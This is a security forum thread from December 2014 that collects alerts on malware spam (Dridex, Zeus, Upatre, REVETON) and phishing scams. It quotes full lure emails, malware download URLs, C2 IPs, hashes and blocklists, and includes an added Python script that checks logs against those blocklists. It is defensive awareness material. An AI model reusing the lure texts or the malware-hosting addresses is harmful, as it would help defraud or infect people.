Specifically, VirusTotal lists badness on the following IPs:
5.196.33.8: https://www.virustotal.com/en/ip-address/5.196.33.8/information/
5.196.33.9: https://www.virustotal.com/en/ip-address/5.196.33.9/information/
5.196.33.10: https://www.virustotal.com/en/ip-address/5.196.33.10/information/
There are also some doubtful looking IP addresses on 5.196.33.15** which may have a malicious purpose... suggest that you treat them as malicious.
Recommended blocklist:
5.196.33.8/29 ..."
(Long list at the dynamoo URL at the top of this post.)
* https://twitter.com/kafeine/status/541550193649680385

** https://www.virustotal.com/en/ip-address/5.196.33.15/information/
___

Fake 'UPS Customer Service' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ups-customer-service-fake-pdf-malware/
9 Dec 2014 - "'UPS Customer Service' pretending to come from UPS Customer Service [mailto:upsdi@ ups .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: UPS Customer Service [mailto:upsdi@ ups .com]
Sent: December 9, 2014 11:25
To: [redacted]
Subject: [SPAM] UPS Customer Service
IMPORTANT DELIVERY
Dear [redacted]
You have received an important delivery from UPS Customer Service.
Please pick up the ePackage at the following Web address:
The ePackage will expire on Thursday December 11, 2014, 00:00:00 EDT
…………………………………………………………….
HOW TO PICK UP YOUR ePackage
* If the Web address above is highlighted, click on it to open a browser window. You will automatically be taken to the ePackage.
* If the Web address above is not highlighted, then follow these steps:
– Open a web browser window.
– Copy and paste the entire Web address into the ‘location’ or ‘address’ bar of the browser.
– Press enter.
Once you arrive at the ePackage web page, you can access the attached files and/or private message.
…………………………………………………………….
If you require assistance please contact UPS Customer Service.
Please note: This e-mail was sent from an auto-notification system that cannot accept incoming e-mail. Please do not reply to this message.
This e-mail is intended for the addressee shown. It contains information that is confidential and protected from disclosure. Any review,
dissemination or use of this transmission or its contents by persons or unauthorized employees of the intended organizations is strictly prohibited.
__________________________________
Delivered by UPS ePackage

9 December 2014: ePackage_12092014_42.pdf.zip: Extracts to: ePackage_12092014_42.pdf.scr
Current Virus total detections: 0/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8be655497ded041cc896788e543e5dad24a5dea518f9d869e376948b004c2e71/analysis/1418149697/
... Behavioural information
TCP connections
54.225.211.214: https://www.virustotal.com/en/ip-address/54.225.211.214/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
___

Phishing SCAM - 'Your Email Address Transmitting Viruses'
- http://www.hoax-slayer.com/email-address-transmitting-viruses-phishing.shtml
Dec 9, 2014 - "... The email is -not- from any email administrator or service provider. It is a phishing scam designed to steal your account login details via a fake login form. If you click the link and login on the -fake- site, your email account may be hijacked by criminals and used for spam and scam campaigns... Example:

Subject: Take note [email address removed]: Your email address will be terminated now
Dear [email address removed]
Your email address (removed) has been transmitting viruses to our servers and will be deactivated permanently if not resolved.
You are urgently required to sanitize your email or your access to email services will be terminated
Click here now to scan and sanitize your e-mail account
Note that failure to sanitize your email account immediately will lead to permanent deactivation without warning.
We are very sorry for the inconveniences this might have caused you and we assure you that everything will return to normal as soon as you have done the needful.
Admin

According to this email, which claims - rather vaguely - to be from 'Admin', your email has been transmitting viruses to the sender's servers. The email warns that your account will be deactivated permanently if you do not resolve the issue. The message instructs you to 'urgently' click a link to run a scan and 'sanitize your e-mail account'... Clicking the link takes you to a fraudulent webpage that includes a stolen Norton Antivirus logo and a login box (See screenshot below*). The page instructs you to login with your email address and password to run a 30 second scan. After 'logging in', a 'Please wait - scanning' message will be displayed for a few seconds. Finally, a 'Scan Complete' message will be shown. At this point, you may believe that the viruses have been removed and you have successfully resolved the issue... however, the criminals behind the scam can collect your login details and hijack your real email account. They may use the hijacked account to launch further spam and scam campaigns in your name..."
* http://www.hoax-slayer.com/images/email-address-tansmitting-viruses.jpg

:mad: :fear:
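Several posts in this thread end with a "Recommended blocklist" that mixes single IPs with CIDR ranges (46.161.30.0/24 on 4 Dec, 5.196.33.8/29 above), and the VirusTotal behavioural sections list the addresses a sample actually talked to. A practical way to use both is to match observed outbound connections against the blocklist with proper network arithmetic, so that 5.196.33.10 is caught by the /29 but 5.196.33.16 is not. The script below is an added example for this thread, not code from dynamoo or any quoted source. The blocklist entries are the IPs and ranges quoted in the 4, 5 and 9 December posts above; the connection log lines and their format are constructed for the example and are not real traffic.

```python
"""Match outbound connections against the thread's recommended blocklists.

Added example.  Blocklist entries come from the quoted dynamoo posts; the
log lines and their 'time src -> dst:port' format are constructed.
"""
import ipaddress

# Entries exactly as recommended in the posts above (single IPs and CIDRs).
BLOCKLIST = [
    "46.161.30.0/24",    # KolosokIvan-net, TorrentLocker phone-home (4 Dec)
    "5.196.33.8/29",     # OVH UK block flagged with Angler EK (9 Dec)
    "194.146.136.1", "84.92.26.50", "79.137.227.123", "124.217.199.218",  # 5 Dec
    "203.172.141.250", "46.4.232.200", "74.208.11.204",                   # 5 Dec
]


def compile_blocklist(entries):
    """Turn the mixed list into ip_network objects; a bare IP becomes a /32."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def lookup(ip, networks):
    """Return the blocklist network (as text) containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    for net in networks:
        if addr in net:
            return str(net)
    return None


def scan_connection_log(lines, networks):
    """Return (dst_ip, matched_network, line) for each hit in the log.

    Lines are 'timestamp src -> dst:port'; anything else is skipped, as is a
    destination that does not parse as an IP address.
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4 or parts[2] != "->":
            continue
        dst = parts[3].rsplit(":", 1)[0]
        try:
            match = lookup(dst, networks)
        except ValueError:
            continue
        if match:
            hits.append((dst, match, line))
    return hits


def to_iptables_rules(networks):
    """Render the blocklist as outbound DROP rules (one per network)."""
    return ["iptables -A OUTPUT -d %s -j DROP" % net for net in networks]


# Constructed sample log: two hosts talking to addresses inside the ranges,
# one to a benign address, one just outside the /29.
SAMPLE_LOG = [
    "2014-12-09T10:15:01 10.0.0.23 -> 5.196.33.10:80",
    "2014-12-09T10:15:04 10.0.0.23 -> 93.184.216.34:443",
    "2014-12-09T10:16:11 10.0.0.41 -> 46.161.30.77:443",
    "2014-12-09T10:16:12 10.0.0.41 -> 5.196.33.16:80",
    "2014-12-09T10:17:30 10.0.0.19 -> 194.146.136.1:8080",
    "malformed line that should be ignored",
]

if __name__ == "__main__":
    nets = compile_blocklist(BLOCKLIST)
    for dst, net, line in scan_connection_log(SAMPLE_LOG, nets):
        print("HIT %-16s in %-18s %s" % (dst, net, line))
    print("\n".join(to_iptables_rules(nets)))
```

Feeding real proxy or firewall logs through `scan_connection_log` gives the "who already talked to this" answer that matters after a blocklist is published; the rule output is a starting point and should be reviewed before deployment, since a /24 recommendation is a judgement call by the original analyst.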

AplusWebMaster
2014-12-10, 13:52
FYI...

Fake 'Remittance Advice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/spam-remittance-advice-from-anglia.html
10 Dec 2014 - "This spam email does not come from Anglia Engineering Solutions Ltd but instead comes from a criminally-operated botnet and has a malicious attachment.
From: Serena Dotson
Date: 10 December 2014 at 10:33
Subject: Remittance Advice from Anglia Engineering Solutions Ltd [ID 334563N]
Dear ,
We are making a payment to you.
Please find attached a copy of our remittance advice, which will reach your bank account on 11/12/2014.
If you have any questions regarding the remittance please contact us using the details below.
Kind regards
Serena Dotson
Anglia Engineering Solutions Ltd ...

The sender's name, ID number and attachment name vary from spam email to spam email. It comes with one of two Excel attachments, both of which are malicious but are undetected by any AV product [1] [2] which contains one of two malicious macros... which attempts to download an executable from the following locations:
http ://217.174.240.46:8080/stat/lld.php
http ://187.33.2.211:8080/stat/lld.php
This file is downloaded as test.exe and is then copied to %TEMP%\LNUDTUFLKOJ.exe. This executable has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows attempted connections to the following IPs:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
84.92.26.50 (PlusNet, UK)
87.106.246.201 (1&1, Germany)
Traffic to 194.146.136.1 is also confirmed by VirusTotal. The Malwr report shows the same traffic. The payload is most likely Dridex, a banking trojan. I recommend that you block traffic to the following IPs:
194.146.136.1
84.92.26.50
87.106.246.201
217.174.240.46
187.33.2.211 "
1] https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418208470/

2] https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418208468/

* https://www.virustotal.com/en/file/c92200fd311abe6f1e8422781f3eefec7ef2791ab0f43e4552bd27488091da94/analysis/1418208856/

- http://myonlinesecurity.co.uk/remittance-advice-anglia-engineering-solutions-ltd-excel-xls-malware/
10 Dec 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Anglia-Engineering-Solutions.jpg

* https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418209362/

** https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418209779/
___

Fake JPMorgan Chase – ACH – Bank account info SPAM – PDF malware
- http://myonlinesecurity.co.uk/gre-project-accounting-jpmorgan-chase-ach-bank-account-information-form-fake-pdf-malware/
10 Dec 2014 - "'ACH – Bank account information form' pretending to come from random names at jpmchase.com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please fill out and return the attached ACH form along with a copy of a voided check.
Jules Hebert,
JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor
Fax-602-221-2251
Jules.Hebert@ jpmchase .com
GRE Project Accounting

10 December 2014: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr
Current Virus total detections: 5/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37ca2089e469332ff3400712726cdb85f4e07ef84d245e9d68b9ed1276dac0d7/analysis/1418238116/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
213.175.194.96: https://www.virustotal.com/en/ip-address/213.175.194.96/information/
UDP communications
107.23.150.92: https://www.virustotal.com/en/ip-address/107.23.150.92/information/
___

Fake 'PRODUCT ENQUIRY' SPAM - jpg malware
- http://myonlinesecurity.co.uk/re-product-enquiry-fake-jpg-malware/
10 Dec 2014 - "'RE: PRODUCT ENQUIRY' coming from a random company with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
We are very interested in your product line. We got your profile from sister-companies. Can you please email me the list of all your Class A products and their prices? How much is the minimum order for shipping? What is the mode of payment and can you ship to Stockholm (SWEDEN)?
Please refer to the attached photo in my email. I was informed that this was purchased from your company. I would also like to order this product. Can you send the product code in your reply.
Thank you very much
Stven Clark
Lindhagensgatan 90,
112 18 Stockholm,
SWEDEN…

10 December 2014: Product Image NO. 1_jpeg…………….. (1).7z:
Extracts to: Product Image NO. GXD46474848494DHW_jpeg…………….. (1).exe
Current Virus total detections: 2/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper jpg file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d723f44d1d2943966f9ad4e5529af1816bfb51f261e68304241255a68f8c15d7/analysis/1418220978/
___

85% of website scams - China
- http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
10 Dec 2014 - "Chinese internet users are behind 85 per cent of -fake- websites, according to a semi-annual report [PDF*] from the Anti-Phishing Working Group (APWG). Of the 22,679 -malicious- domain registrations that the group reviewed, over 19,000 were registered to servers based in China. This is in addition to nearly 60,000 websites that were hacked in the first half of 2014 and then used to acquire people's details and credit card information while pretending to offer real goods or services. Chinese registrars were also the worst offenders, with nine of the top ten companies with the highest percentages of phished domains based in China. Dot-com domains are the most popular for phishing sites, being used in 51 per cent of cases, but when it comes down to the percentage of phished domains against the number of domains under that registry, the clear winner is the Central African Republic's dot-cf, with more than 1,200 phished domains out of a total of 40,000 (followed by Mali's dot-ml, Palau's dot-pw and Gabon's dot-ga). Despite concerted efforts to crack down on fake websites, little improvement was made on the last report in terms of uptime (although it is significantly lower than when the group first started its work back in 2010). The average uptime of a phishing site was 32 hours, whereas the median was just under 9 hours. As for the phishers' targets: Apple headed the list for the first time, being used in 18 per cent of all attacks, beating out perennial favorite PayPal with just 14 per cent. Despite some fears, the introduction of hundreds of new generic top-level domains has not led to a noticeable increase in phishing, according to the report. The authors posit that this may be because of the higher average price of new gTLDs, although they expect the number of new gTLD phished domains to increase as adoption grows and websites are compromised. Around 20 per cent of phishing attacks are achieved through hacking of vulnerable shared hosting providers..."
* http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___

Zeus malware thru browser warning: social engineering...
- http://blog.phishlabs.com/zeus-malware-distributed-through-browser-warning-social-engineering-at-its-finest
Dec 5, '14 - "Zeus malware continues to plague the Internet with distributions through spam emails and embeds in compromised corners of the web – all designed to exploit unsuspecting consumers. PhishLabs’ R.A.I.D. (Research Analysis and Intelligence Division) recently observed the Zeus malware being distributed through an alarmingly convincing browser warning that prompts viewers to download and “restore settings”... designed to manipulate viewers so that they believe the alert is based on security preferences that he or she has previously set up. The message creates a sense of urgency and fear, warning of “unusual activity”... Generally speaking, grammar and spelling are often indicators of fake or malicious requests that lead to malware but cybercriminals have caught on to this vulnerability and stepped up their game. Although it is not perfect, the warning observed in this case was much more accurate than what we usually see. The warning states:
"REPORTED BROWSER ONLINE DOCUMENT FILE READER WARNING”. We have detected unusual activities on your browser and the Current Online Document File Reader has been blocked base on your security preferences. It is recommended that you update to the latest version available in order to restore your settings and view Documents."
Browser warning leading to Zeus malware download:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2183047529-png/blog-files/Zeus_Browser_Warning.png
The fake browser warning requires the user to click the "Download and Install" button. Once clicked, the victim is redirected to a site that downloads the Zeus executable (Zbot) malware. The R.A.I.D was able to track the malware back to the Zeus control panel...
Zeus (Zbot) malware control panel:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2184127607-png/blog-files/Zeus_Control_Panel..png
Web users should be on the lookout for this kind of social engineering that capitalizes on fear and misleads users to believe the alert is showing up based on user-defined preferences. Zeus is a dangerous malware that continues to be distributed through sophisticated avenues. In the past, Zeus infections have led to exploitation of machines, making them part of a -botnet-, as well as bank account takeovers and fraud."

:fear::fear: :mad:

AplusWebMaster
2014-12-11, 13:19
FYI...

Fake Invoice 'UK Fuels E-bill' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/uk-fuels-e-bill-ebillinvoicecom-spam.html
11 Dec 2014 - "This -fake- invoice comes with a malicious attachment:
From: invoices@ ebillinvoice .com
Date: 11 December 2014 at 08:06
Subject: UK Fuels E-bill
Customer No : 35056
Email address : [redacted]
Attached file name : 35056_49_2014.doc
Dear Customer
Please find attached your invoice for Week 49 2014.
In order to open the attached DOC file you will need
the software Microsoft Office Word.
If you have any queries regarding your e-bill you can contact us at invoices@ ebillinvoice .com.
Yours sincerely
Customer Services
UK Fuels Ltd ...

This spam is not from UK Fuels Ltd or ebillinvoice .com and is a forgery. Attached is a malicious Word document which in the sample I have seen is undetected by AV vendors*. This downloads a file from the following location:
http ://KAFILATRAVEL .COM/js/bin.exe
This is downloaded and saved to %TEMP%\LNKCLHSARFL.exe. This binary only has a detection rate of 3/56** at VirusTotal. The Malwr report shows that it POSTs data to 203.172.141.250 (Ministry of Education, Thailand), which has been commonly used in this sort of attack (I strongly recommend that you -block- this IP). It also drops a DLL which is probably Dridex, which has a detection rate of only 1/55***."
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418293134/

** https://www.virustotal.com/en/file/9fae183a06c6980b8f6662156612e395e70cf75aa1c266037fcbbd283e9923ad/analysis/1418293637/

*** https://www.virustotal.com/en/file/a35597d4ae580653b5c26f0e739215e63ab39e74a76903357ed1616d096e1962/analysis/1418294506/

- http://myonlinesecurity.co.uk/uk-fuels-e-bill-word-doc-malware/
11 December 2014 : 35056_49_2014.doc (89kb) Current Virus total detections: 0/56*
35056_49_2014.doc (69kb) Current Virus total detections: 0/56**
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418285959/

** https://www.virustotal.com/en/file/1e367459dd260c055f3b51cf22d7d8125cfc14b3d3178d6b3cf60850091f4dc7/analysis/1418285875/
___

Fake 'RBS Important Docs' SPAM – doc malware
- http://myonlinesecurity.co.uk/rbs-important-docs-word-doc-malware/
11 Dec 2014 - "'RBS Important Docs' pretending to come from Lenore Hinkle <Lenore@ rbs .co .uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review attached documents regarding your account.
Tel: 01322 182123
Fax: 01322 011929
email: Lenore@ rbs .co.uk
This information is classified as Confidential unless otherwise stated.

11 December 2014: RBS_Account_Documents.doc (1mb) Current Virus total detections: 1/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e1552f04ca253e3910d0b3fa0e96bca3ce43561c2cb53162bad1436b4d5f0de5/analysis/1418306209/
___

REVETON Ransomware spreads ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/reveton-ransomware-spreads-with-old-tactics-new-infection-method/
Dec 11, 2014 - "... Over the past few months spanning October up to the last weeks of November, we observed a noticeable increase in REVETON malware variants, in particular, TROJ_REVETON.SM4 and TROJ_REVETON.SM6... Below is the warning message along with a MoneyPak form to transfer the payment of $300 USD. The message also warns users that they have only 48 hours to pay the fine.
Fake warning messages from Homeland Security and the ICE Cyber Crime Center:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/homeland_ice.png
... the healthcare industry seems to be the most affected industry by this malware and mostly centered in the United States, followed by Australia. Below is a ranking of most affected countries by this new wave of REVETON malware spanning October to November 2014.
Data for TROJ_REVETON.SM4 and TROJ_REVETON.SM6 for October – November 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/reveton-new-infect2.jpg
... It might be jarring for users to suddenly receive a message supposedly sent by law enforcement agencies. However, they need to keep in mind that this is just a tactic intended to “scare” users into paying the fee. Users might also be tempted to pay the ransom to get their computers up and running once again. Unfortunately, there is no guarantee that paying the ransom will result in having the computer screen unlocked. Paying the ransom will only guarantee more money going into the pockets of cybercrooks... Some ransomware variants arrive as attachments of spammed messages. As such, users should be wary of opening emails and attachments, especially those that come from unverified sources. If the email appears to come from a legitimate source (read: banks and other institutions), users should verify the email with the bank. If from a personal contact, -confirm- if they sent the message. Do not rely solely on trust by virtue of relationship, as friends or family members may be victims of spammers as well."
___

Phish: CloudFlare SSL certificate abused
- https://blog.malwarebytes.org/fraud-scam/2014/12/free-ssl-certificate-from-cloudflare-abused-in-phishing-scam/
Dec 11, 2014 - "... received a phishing email pretending to come from LogMeIn, the popular remote administration tool. It uses a classic scare tactic “We were unable to charge your credit card for the due amount.( Merchant message – Insufficient funds )” to trick the user into opening up a -fake- invoice:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/unphish.png
... What struck our interest here was the fact that this link was https based. It was indeed a secure connection... with a valid certificate:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/certificatechain.png
On September 29, CloudFlare, a CDN and DNS provider amongst other things, announced Universal SSL, a feature available to all its paid and free customers. It is not the first time cyber-criminals are abusing CloudFlare, and this case is not entirely surprising. By giving a false sense of security (the HTTPS padlock), users are more inclined to follow through and download the malicious file.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/properties.png
... CloudFlare is issuing a warning that the URL is a ‘Suspected phishing site':
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/warning.png
In some regard SSL certifications may become like digitally signed files, where while they do add a level of trust one should still exercise caution and not blindly assume everything is fine. It might be difficult to keep up with each and every new site that wants to abuse the system (cat-and-mouse game)... We can certainly expect cyber criminals to start using SSL more and more given that it is freely available and not extremely difficult to put in place. Another standard known as Extended Validation Certificate SSL (EV SSL) requires additional validation than plain SSL, but again, this does not make things simple for the end user. If regular SSL is deemed weak, then we have a bit of a problem... We have reported this URL to CloudFlare and hope they can revoke the SSL certificate and shutdown the site."

:fear: :mad:

AplusWebMaster
2014-12-12, 19:32
FYI...

Info-Stealing file infector hits US, UK
- http://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/
Dec 11, 2014 5:15 pm (UTC-7) - "... there has been a spike in infections related to the malware URSNIF. The URSNIF family is known to steal information such as passwords. Spyware is always considered high risk, but these URSNIF variants can cause damage beyond info-stealing. These URSNIF variants are file-infectors — which is the cause of the noted spike... the countries most affected by the spike are the United States and the United Kingdom. These two countries comprise nearly 75% of all the infections related to these URSNIF variants. Canada and Turkey are the next countries most affected by the malware.
Countries affected by URSNIF spike, based on data gathered for December 2014 so far:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike.jpg
Additional feedback shows that education, financial, and manufacturing were among the industries affected by this spike... It infects all .PDF, .EXE, and .MSI files found in all removable drives and network drives. URSNIF packs the found files and embeds them into its resource section. When these infected files are executed, it will drop the original file in %User Temp% (~{random}.tmp.pdf, ~{random}.tmp.exe) and then execute it to trick the user into thinking the opened file is still fine... After deleting the original .PDF file, it will create an .EXE file using the file name of the original .PDF file. As for .MSI and .EXE files, it will insert its code into the current executable. It will only infect .EXE files with “setup” in the filename.
Difference between an infected (top) and clean (bottom) .PDF file. The infected file is 3.18 MB while the clean file is 2.89 MB:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike3.png
For MSI files, it will execute the original file first before executing the malware code. For .PDF and .EXE files, it will produce a dropper-like Trojan, which will drop and execute the original file and the main file infector... The malware family URSNIF is more known as spyware. Variants can monitor network traffic by hooking network APIs related to top browsers such as Internet Explorer, Google Chrome, and Mozilla Firefox. It is also known for gathering information. However, the fact that a family known for spyware now includes file infectors shows that cybercriminals are not above tweaking established malware to expand its routines... A different file infector type (e.g., appending) requires a different detection for security solutions; not all solutions may have this detection. Another notable feature for this particular malware is that it starts its infection routine 30 minutes after its execution... variants often arrive via spammed messages and Trojan dropper/downloader malware. Users need a comprehensive security solution that goes beyond detecting and blocking malware. Features like email reputation services which can detect and block spam and other email-related threats can greatly boost a computer’s security... infected .PDF and .EXE files as PE_URSNIF.A2. Infected .MSI files are detected as PE_URSNIF.A1.
Hashes of the related files:
dd7d3b9ea965af9be6995e823ed863be5f3660e5
44B7A1555D6EF109555CCE88F2A954CAFE56B0B4
EFC5C6DCDFC189742A08B25D8842074C16D44951
FD3EB9A01B209572F903981675F9CF9402181CA1 "
___

Fake 'Order' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/wavecablecom-order-r58551-spam.html
12 Dec 2014 - "This -fake- invoice comes with a malicious attachment.
From: kaybd2@ wavecable .com
Date: 12 December 2014 at 17:17
Subject: Order - R58551
Thanks for placing order with us today! Your order is now on process.
Outright Purchase: 6949 US Dollars
Please click the word file provided below to see more details about your order.
BILLING DETAILS
Order Number: ZJW139855932
Purchase Date: 13.07 11.12.2014
Customer Email: info@ [redacted]

Attached is a malicious Word document INVOICE_7794.DOC which has a detection rate of 4/56* on VirusTotal... macro downloads an executable from:
http ://www.2fs. com .au/tmp/rkn.exe
That has a VirusTotal detection rate of 5/55**... A malicious DLL is dropped onto the system with a VirusTotal detection rate of 2/56***. The only detections are generic, but similar dropped DLLs have been the Dridex banking trojan.
Recommended blocklist:
209.208.62.36
5.187.1.78
46.250.6.1
5.135.28.106
66.213.111.72
95.211.188.129 "
* https://www.virustotal.com/en/file/902aa90dd61f1a89a547726ff06555285463c826d1af673ebdcc148c2200b229/analysis/1418406000/

** https://www.virustotal.com/en/file/90fca160a837f62fdcff2fc3d0a849498a3485c39c7c42a12dc959f5e5db0e56/analysis/1418406121/

*** https://www.virustotal.com/en/file/b13eb856439baf196084f6fc47825d9c677199f71724f351cdd193e30e2618c4/analysis/1418408045/
___

Spammers Accelerate Dyre Distribution
- http://www.threattracksecurity.com/it-blog/dyre-spam/
Dec 12, 2014 - "... Over the last few weeks, the cybercriminals behind Dyre have continued to refine their delivery tactics, and the Trojan is now capable of helping to spread itself and other malware. Our researchers have observed that systems infected with Dyre are not only at risk of the malware stealing log-in credentials, but they may also receive commands to download and install additional spammers – including the Cutwail/Pushdo botnet – to more broadly propagate Dyre. Pushdo is responsible for a large portion of Upatre spam, and the botnet is actively distributing Dyre and other malware, including the data-encrypting ransomware CryptoWall... The bad guys are pulling out all the stops when it comes to distributing their malicious spam. Everything from fraudulent PayPal security alerts to a Top Gun-inspired tale about a Norwegian fighter pilot crossing paths with a Russian MiG to a fake survey purporting to ask recipients their opinions on the controversial events in Ferguson, Missouri, has been employed to trick recipients into clicking links and opening infected attachments. We recently observed Dyre downloading three spammers. The first is Pushdo, which runs its own spammer modules. The second and third are standalone spammers, one of which hijacks the victim’s Microsoft Outlook application to send personal emails with attachments harboring Upatre. The third spammer (see images and email text below from a small sampling) is generating a separate campaign and has been increasing in frequency over the last several weeks. All this signals that Dyre is poised to become a more pervasive threat and increasingly active in malicious spam campaigns.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/12/CNN-Norwegian-Russian-MiG-Spam.png
(Multiple other SPAM samples shown at the threattracksecurity URL at the top of this post.)
...Ensure your antivirus and endpoint security is up-to-date, and deploy a robust email security solution to protect your organization from malicious spam. IT admins should continue to educate their users about email-borne threats and stress that despite them being at work, they shouldn’t click links and open attachments without regard for security... Consumers should -always- be cautious about what they click, and if there is any doubt about a warning, special offer or request for private information, contact the bank, retailer or service provider directly by -phone- to confirm."
___

Wire transfer spam spreads Upatre
- http://blogs.technet.com/b/mmpc/archive/2014/12/11/wire-transfer-spam-spreads-upatre.aspx
11 Dec 2014 - "... currently monitoring a spam email campaign that is using a wire transfer claim to spread Trojan:Win32/Upatre. It is important to note that customers running up-to-date Microsoft security software are protected from this threat..."

:fear::fear: :mad:

AplusWebMaster
2014-12-15, 17:17
FYI...

Fake 'Payment Advice' SPAM - malicious doc attached
- http://blog.dynamoo.com/2014/12/malware-spam-ifs-applications.html
15 Dec 2014 - "This -fake- payment advice spam is not from Vitacress but is a -forgery- with a malicious Word document attached.
From: IFS Applications [Do_Not_Reply@ vitacress .co.uk]
Date: 15 December 2014 at 07:49
Subject: DOC-file for report is ready
The DOC-file for report Payment Advice is ready and is attached in this mail.

Attached is a file Payment Advice_593016.doc which is actually one of two different documents with zero detections at VirusTotal [1] [2] and contains one of two malicious macros... that download a malware binary from one of the following locations:
http ://gv-roth .de/js/bin.exe
http ://notaxcig .com/js/bin.exe
This file is saved as %TEMP%\DYIATHUQLCW.exe and currently has a VirusTotal detection rate of just 1/52*. The ThreatExpert report and Malwr report show attempted connections to the following IPs which have been used in many recent attacks and should be -blocked- if you can:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1, US)
The malware almost definitely drops the Dridex trojan onto the target system, but I have not been able to get a sample of this yet."
1] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418633977/

2] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418633990/

* https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/1418634587/

>> http://myonlinesecurity.co.uk/ifs-applications-doc-file-report-ready-word-doc-malware/
15 Dec 2014
1] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418628093/

2] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418628835/

- http://blog.mxlab.eu/2014/12/15/email-doc-file-for-report-is-ready-contains-malicious-word-macro-file-that-downloads-trojan/
Dec 15, 2014
> https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/
... Behavioural information
TCP connections
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___

GoDaddy 'Account Notice' - Phish ...
- http://www.hoax-slayer.com/godaddy-account-error-phishing-scam.shtml
Dec 15, 2014 - "Email purporting to be from web hosting company GoDaddy claims that your account may pose a potential performance risk to the server because it contains 'too many directories'... The email is -not- from GoDaddy. It is a phishing scam designed to steal your GoDaddy login details. A link in the message takes you to a -fake- Go Daddy login page...
Example:
Subject: Account Notice : Error # 7962
Dear Valued GoDaddy Customer: Brett Christensen
Your account contains more than 3331 directories and may pose a potential performance risk to the server.
Please reduce the number of directories for your account to prevent possible account deactivation.
In order to prevent your account from being locked out we recommend that you create special TMP directory.
Or use the link below :
[Link Removed]
Sincerely,
GoDaddy Customer Support...

